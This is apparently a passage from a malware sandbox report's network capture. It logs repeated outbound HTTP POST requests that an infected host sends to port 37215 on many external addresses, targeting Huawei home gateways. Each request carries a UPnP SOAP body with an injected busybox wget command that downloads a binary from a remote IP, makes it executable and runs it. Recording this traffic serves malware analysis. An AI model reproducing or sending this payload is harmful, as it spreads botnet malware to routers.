                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2258192.168.2.153519041.21.74.2437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673043013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2259192.168.2.154336241.114.64.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673043013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2260192.168.2.154371841.82.4.2237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673043013 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2261192.168.2.155181841.84.63.17437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673099041 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2262192.168.2.155802641.196.214.18537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673101902 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2263192.168.2.154910041.250.99.6537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673170090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2264192.168.2.155341841.211.120.19437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673170090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2265192.168.2.154274241.42.48.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673170090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2266192.168.2.154583641.8.8.17537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673172951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2267192.168.2.156097441.224.217.2137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.673172951 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
